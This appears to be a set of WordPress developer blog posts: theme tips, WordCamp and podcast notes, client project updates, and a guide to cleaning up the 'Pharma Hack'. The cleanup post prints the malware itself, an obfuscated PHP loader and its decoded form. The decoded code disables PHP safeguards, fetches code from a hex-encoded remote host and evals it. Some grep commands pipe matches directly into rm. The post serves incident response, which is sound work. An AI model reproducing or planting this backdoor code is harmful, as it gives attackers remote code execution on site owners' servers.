WordPress Menu Support for Older Themes

As a lot of you that are die-hard WordPress users are probably already aware, WordPress has launched their new menu builders under the appearance tab. The menu builder will allow you to create a menu from any categories, pages and links, order them by drag and drop, create submenus, etc.

This is something that I am pretty sure was contributed to core from the good people at WooThemes, because they had this for a while in some of their theme settings. In the event you have an older WordPress Theme and would like to have this functionality but inside the dashboard you keep getting a notice that your theme is not compatable, here’s what you can do…

Locate your theme directory/ functions.php and add this line of code:

// This theme uses wp_nav_menu() in one location.
register_nav_menus( array(
	'primary' => 'Primary Navigation'
) );

Secondly, locate your theme directory/header.php file and add/edit this line of code:

<?php wp_nav_menu( 'sort_column=menu_order&container_class=menu-header' ); ?>

Once these two files have been modified you should be able to log back into your wordpress installation dashboard and select the menu option under appearance and get started.

EP:023 – The Cotton Club Podcast

This evening I had the opportunity to chat w/ Keith Crawford, Steven Trotter, and Christopher Spencer about this years Wordcamp Fayetteville. During the show Chris, who is heading up the event, went over the 4 tracks for the event as well as touching on some of the content that would be covered this year. As a sidenote, I will be speaking during one of the sessions this year on WordPress profitability for agencies and freelancers, you can see my blog post about my discussion here…

If you haven’t registered for Wordcamp Fayetteville yet you had better get on the ball, I think there are 20+ spots available for the conference. To register online, click here…

My #WCFAY Presentation Slides

FYI, the formatting is not good in these slides for some reason…

Presentation Preview for #WCFay

I will be doing a presentation titled ‘Making WordPress Profitable for Agencies / Design Firms‘ during Wordcamp Fayetteville this year, which is taking place on July 30, 2011 in Fayetteville, at the Donald W. Reynolds Center for Enterprise Development. If you haven’t registered already, there is still time, the price for general admission is $35 and you can click here to register online.

The people in charge at #WCFay asked me to do a short blog post or teaser so that those attending the conference will have a heads up as to what my talk will be about. In short, it’s all about making money. I could just leave it at that and feel pretty confident that I have proposed a topic that will be of interest to everyone there, but I will take it a step further. This discussion is going to more or less look at our industry from a business owners perspective and why I feel like WordPress is the most powerful tool we have in our arsenal today. I will also share some tips that can help your agency or firm become more profitable during a down economy…

I am looking forward to this discussion. Here’s a few teaser slides from my presentation…

This should be a fun presentation, hope to see you there!!

Current Projects: Rosewood Cremations

We completed a project for Rosewood Classic Coach a few months ago and they were so happy w/ the way the project turned out they asked us to take a look at their Rosewood Cremation website and convert it to WordPress for them. In addition they also wanted to add a small amount of e-commerce to the site as well as converting some of their forms to interactive PDF’s.   I haven’t completed the project yet but can share a screenshot. The entire project was build upon the Genesis framework in WordPress.

Current Projects: Detco, Inc.

I was recently contacted by long-time client, Detco Industries, Inc. about developing two small projects for them. Each of these micro websites will contain product information such as MSDS, TDS, and DTS (product label) information. In the future they also wanted to ability to post additional information about their products such as YouTube videos, etc. I elected to use WordPress w/ the Genesis Framework to develop each of these projects instead of building a custom database driven application and my development time wasn’t consumed w/ writing code. I absolutely love Genesis framework, both of these projects were designed using the Genesis Child Theme as the starting point.  Since neither site is live right now I can’t post any links, but here are a few screengrabs…

 

 

Current Projects: Arkansas Adoption

This is a project that my wife and I are partnering with a local attorney, Shane Henry, to bring online that serves as a tool to recruit pregnant mothers that might be looking to either have an abortion or put their children up for adoption. Please be in prayer w/ Donna and I that we are able to locate a child through this effort…

This website will contain a lot of answers to frequently asked questions regarding adoption, adoption in Arkansas, and hopefully serve as a useful resource for it’s users. The website hasn’t launched yet but will hopefully have it ready to go live by the end of this month, in the meantime, here’s a screenshot of what the website will look like…

 

Removing WordPress Pharma Hack

I posted a few weeks ago about the WordPress Pharma Hack that has been running pretty rampant across the web, in case you missed my initial post, here’s a link. Well, I would like to say that we were able to jump right on this thing and immediately remove it pretty easily, but that simply wasn’t the case. I worked closely w/ Matt Critcher, our server admin at Pleth, LLC, and probably one of the sharpest guys I know, and we toiled over this thing daily for about a week or so until we finally eradicated it from all of our WordPress installations. For the benefit of all of you that are still wrestling w/ this hack, here’s exactly how we removed it…

Locate all base64_decode

This hack, like a lot of others, used base64 code to disguise JavaScript (so we have to locate it and remove it, this is what it will look like)

< ? php $XZKsyG=’as’;$RqoaUO=’e';$ygDOEJ=$XZKsyG.’s’.$RqoaUO.’r’.’t';$joEDdb
=’b’.$XZKsyG.$RqoaUO.(64).’_’.’d’.$RqoaUO.’c’.’o’.’d’.$RqoaUO;@$ygDOEJ(@$j
oEDdb(‘ZXZhbChiYXNlNjRfZGVjb2RlKCJhV1lvYVhOelpY.......and so on...

To locate and remove the code, you will need to SSH into your server, CD into the wordpress home directory and do the following

grep -r 'php \$[a-zA-Z]*=.as.;' * |awk -F : '{print $1}' | xargs -I{} rm -v {}

This will scan the entire folder and all it’s sub-directories for any file containing the string “php $RANDOMLETTERS=’as’” and delete it verbosely. If you do not wish to delete it automatically just run this to print out the filename.

grep -r 'php \$[a-zA-Z]*=.as.;' * |awk -F : '{print $1}'

When we did this, there were about 50 files that contained the exploit.  There are other files containing nasty code as well. You will also need to to search for and remove files containing the string “wp_class_support”.

grep -r wp_class_support * |awk -F : '{print $1}' |xargs -I{} rm -v {}

This bit of syntax will search for files with that string and delete them (if you want to manually delete them, leave off the xargs part as per the above example).

I also found this nasty thing (not sure if it is related to the Pharma Hack) in several files. All were WordPress core files, so you MUST replace every WordPress file on your site with clean ones. DO NOT do this via the internal utility – use FTP, SCP, or whatever to get these files uploaded. Once you have done this, do

grep -r QGluaV9yZXN0b * |awk -F : '{print $1}'

This will search the remaining files for the exploit. Any files containing this MUST be replaced or you are still infected. The full text of the exploit the base64 encoded string as follows:

QGluaV9yZXN0b3JlKCJzYWZlX21vZGUiKTtAaW5pX3Jlc3RvcmUoIm9wZW5fYmFzZWRpciIpO0BpbmlfcmVzdG9yZSgic2Fm
ZV9tb2RlX2luY2x1ZGVfZGlyIik7QGluaV9yZXN0b3JlKCJzYWZlX21vZGVfZXhlY19kaXIiKTtAaW5pX3Jlc3RvcmUoImRp
c2FibGVfZnVuY3Rpb25zIik7QGluaV9yZXN0b3JlKCJhbGxvd191cmxfZm9wZW4iKTsNCmlmKEBmdW5jdGlvbl9leGlzdHMo
J2luaV9zZXQnKSkNCntAaW5pX3NldCgnZXJyb3JfbG9nJyxOVUxMKTsgQGluaV9zZXQoJ2xvZ19lcnJvcnMnLDApOyBAaW5p
X3NldCgnZmlsZV91cGxvYWRzJywxKTsgQGluaV9zZXQoJ2FsbG93X3VybF9mb3BlbicsMSk7fQ0KZWxzZXtAaW5pX2FsdGVy
KCdlcnJvcl9sb2cnLE5VTEwpOyBAaW5pX2FsdGVyKCdsb2dfZXJyb3JzJywwKTsgQGluaV9hbHRlcignZmlsZV91cGxvYWRz
JywxKTsgQGluaV9hbHRlcignYWxsb3dfdXJsX2ZvcGVuJywxKTt9DQpmdW5jdGlvbiBHZXRTaGVsbENvbnRlbnQoJGhvc3Qs
JHVybCl7aWYoQGZ1bmN0aW9uX2V4aXN0cygnY3VybF9pbml0JykpeyRmdWxsX3VybD0naHR0cDovLycuJGhvc3QuJy8nLiR1
cmw7JGN1cmw9Y3VybF9pbml0KCk7Y3VybF9zZXRvcHQoJGN1cmwsQ1VSTE9QVF9VUkwsJGZ1bGxfdXJsKTtjdXJsX3NldG9w
dCgkY3VybCxDVVJMT1BUX1JFVFVSTlRSQU5TRkVSLHRydWUpO2N1cmxfc2V0b3B0KCRjdXJsLENVUkxPUFRfSEVBREVSLGZh
bHNlKTtjdXJsX3NldG9wdCgkY3VybCxDVVJMT1BUX0NPTk5FQ1RUSU1FT1VULDEwKTtjdXJsX3NldG9wdCgkY3VybCxDVVJM
T1BUX1VTRVJBR0VOVCwnTW96aWxsYS80LjAnKTskZGF0YT1AY3VybF9leGVjKCRjdXJsKTtjdXJsX2Nsb3NlKCRjdXJsKTty
ZXR1cm4gJGRhdGE7fWVsc2VpZihAZnVuY3Rpb25fZXhpc3RzKCdmc29ja29wZW4nKSl7JGZwPUBmc29ja29wZW4oJGhvc3Qs
ODAsJGVycm5vLCRlcnJzdHIsMTApO2lmKCRmcCl7JG91dD0iR0VUIC8kdXJsIi4iIEhUVFAvMS4wXHJcbiI7JG91dCAuPSJI
b3N0OiAkaG9zdFxyXG4iOyRvdXQgLj0iVXNlci1BZ2VudDogTW96aWxsYS80LjBcclxuIjskb3V0IC49IkNvbm5lY3Rpb246
IENsb3NlXHJcblxyXG4iO0Bmd3JpdGUoJGZwLCRvdXQpO3doaWxlKCRhbnNbXT1mZ2V0cygkZnApKTtmY2xvc2UoJGZwKTsk
YW5zPXRyaW0oaW1wbG9kZSgnJywkYW5zKSk7JGRhdGE9KHRyaW0oc3Vic3RyKCRhbnMsc3RycG9zKCRhbnMsIlxyXG5cclxu
IikpKSk7cmV0dXJuICRkYXRhO319ZWxzZWlmKEBmdW5jdGlvbl9leGlzdHMoJ2ZpbGVfZ2V0X2NvbnRlbnRzJykgJiYgQGlu
aV9nZXQoJ2FsbG93X3VybF9mb3BlbicpPT0xKXskZnVsbF91cmw9J2h0dHA6Ly8nLiRob3N0LicvJy4kdXJsOyRkYXRhPUBm
aWxlX2dldF9jb250ZW50cygkZnVsbF91cmwpO3JldHVybiAkZGF0YTt9fQ0KaWYoJF9SRVFVRVNUWydzaCddICE9ICIiKSB7
ZXZhbChiYXNlNjRfZGVjb2RlKEdldFNoZWxsQ29udGVudCgiXHg3M1x4NjVceDZmXHg3NFx4NmZceDZmXHg3M1x4MmVceDYz
XHg2Zlx4NmQiLCJzL2kucGhwPyIuJF9SRVFVRVNUWydzaCddLiImaG9zdD0iLnVybGVuY29kZSgkX1NFUlZFUlsnU0VSVkVS
X05BTUUnXSkuIiZ1cmw9Ii51cmxlbmNvZGUoJF9TRVJWRVJbJ1JFUVVFU1RfVVJJJ10pKSkpO2V4aXQ7fQ==

Which decodes as

@ini_restore("safe_mode");@ini_restore("open_basedir");@ini_restore("safe_mode_include_dir");
@ini_restore("safe_mode_exec_dir");@ini_restore("disable_functions");@ini_restore("allow_url_fopen");
if(@function_exists('ini_set'))
{@ini_set('error_log',NULL); @ini_set('log_errors',0); @ini_set('file_uploads',1);
@ini_set('allow_url_fopen',1);}else{@ini_alter('error_log',NULL); @ini_alter('log_errors',0);
@ini_alter('file_uploads',1); @ini_alter('allow_url_fopen',1);}
function GetShellContent($host,$url){if(@function_exists('curl_init'))
{$full_url='http://'.$host.'/'.$url;$curl=curl_init();
curl_setopt($curl,CURLOPT_URL,$full_url);curl_setopt($curl,CURLOPT_RETURNTRANSFER,true);
curl_setopt($curl,CURLOPT_HEADER,false);curl_setopt($curl,CURLOPT_CONNECTTIMEOUT,10);
curl_setopt($curl,CURLOPT_USERAGENT,'Mozilla/4.0');$data=@curl_exec($curl);
curl_close($curl);return $data;}elseif(@function_exists('fsockopen'))
{$fp=@fsockopen($host,80,$errno,$errstr,10);
if($fp){$out="GET /$url"." HTTP/1.0\r\n";$out .="Host: $host\r\n";
$out .="User-Agent: Mozilla/4.0\r\n";$out .="Connection: Close\r\n\r\n";
@fwrite($fp,$out);while($ans[]=fgets($fp));fclose($fp);$ans=trim(implode('',$ans));
$data=(trim(substr($ans,strpos($ans,"\r\n\r\n"))));
return $data;}}elseif(@function_exists('file_get_contents') && @ini_get('allow_url_fopen')==1)
{$full_url='http://'.$host.'/'.$url;$data=@file_get_contents($full_url);return $data;}}
if($_REQUEST['sh'] != "")
{eval(base64_decode(GetShellContent("\x73\x65\x6f\x74\x6f\x6f\x73\x2e\x63\x6f\x6d","s/i.php?"
.$_REQUEST['sh']."&host=".urlencode($_SERVER['SERVER_NAME'])."&url=".urlencode
($_SERVER['REQUEST_URI']))));exit;}

I went ahead and scanned the whole site for files that had base64_decodes in them. To search for these do the following:

grep -r base64 * |awk -F : '{print $1}' |sort |uniq

This will print out a list of each file that contains the string “base64″. You should examine each file carefully for rouge content, as many files legitimately contain this string and need it to function. If you are unsure of the code, replace the file with a fresh copy. Most of the files I’ve seen that are infected have the base64 statement at the very top of the file but this is not always the case.

Once you get the files cleaned, you need to work on the database. The exploit adds and/or modifies entries in the wp_options table. Using the MySQL interpreter or phpMyAdmin run the following query:

SELECT * FROM `wp_options` where `option_name` LIKE 'rss%' ORDER BY `wp_options`.`option_name` ASC;

This will search the wp_options table for all entries beginning with rss_ and return them. You will need to delete each one that looks similar to this:

rss_552afe0001e673901a9f2caebdd3141d

rss_ followed by strings of random numbers or letters is bad and MUST be deleted as they are added by the exploit. Also, the exploit adds or modifies several other records in the same table. A couple of the sites we found recommended running this query as well as these options should not be set or contain any data:

delete from wp_options where option_name = "class_generic_support";
delete from wp_options where option_name = "widget_generic_support";
delete from wp_options where option_name = "fwp’";
delete from wp_options where option_name = "wp_check_hash";
delete from wp_options where option_name = "ftp_credentials";

—————————————————————-

If all goes well, this information should help you eradicate the WordPress Pharma Hack from your wordpress installation. For a more detailed post on how to remove this hack, I highly recommend Matt Critcher’s post on his blog…

 

Current Projects: Gas & Mineral Rights

I am currently working w/ a client to develop a web resource that will allow property owners to sell their Gas and Mineral Rights to a group that is looking to invest. From a design standpoint, this is a very simple project and for the most part I have that part knocked out and we are just hammering out the details such as the contact forms and content. Since the website is not live I can’t share a link yet, but here’s a screenshot of what one of the pages on the site will look like.We hope to go live w/ the project in the next few weeks.The entire project is built on WordPress.

 

Securing wp-config.php

For the past week or so, our server admin, Matt Critcher, and I have been battling the “pharma-hack” in several WordPress installations, this website included. Long story short, we still haven’t been able to completely eradicate this exploit but I feel like we are getting a lot closer. This afternoon Matt advised that I go through some of our exploited sites and secure the wp-config.php files by adding security keys to them. There is even a generator on the WordPress.org website that you can use to generate these keys…

The process is simple, just generate a new set of security keys and place them inside your existing wp-config.php file. The generated keys will look something like this:

define('AUTH_KEY',         't`DK%X:>xy|e-Z(BXb/f(Ur`8#~Uz|');
define('SECURE_AUTH_KEY',  'D&ovlU#|CvJ##uNq}bel+^MFtT&.bj');
define('LOGGED_IN_KEY',    'MGKi8Br(&{H*~&0s;{fer[hOBk!ry^');
define('NONCE_KEY',        'FIsAsXJKL5ZlQo)iD-pt?aNwI|siOe');
define('AUTH_SALT',        '7T-!^i!0,w)L#JK@pcD;Vcy8,S)-&G');
define('SECURE_AUTH_SALT', 'I6`V|mDZq21-J|ihb u=|n#=]@]c #');
define('LOGGED_IN_SALT',   'w<$4c$Hmd%/*]`}qG(GaVDEsn,~*4i');
define('NONCE_SALT',       'a|#h{c5|P &xp]t=]V<`}.py(wTP%%');

What this will do is invalidate any existing cookies that might be out there. It’s obviously not the complete fix for the “pharma-hack” that I have been looking for but it only takes a second and could save you some potential heartache down the road from other exploits.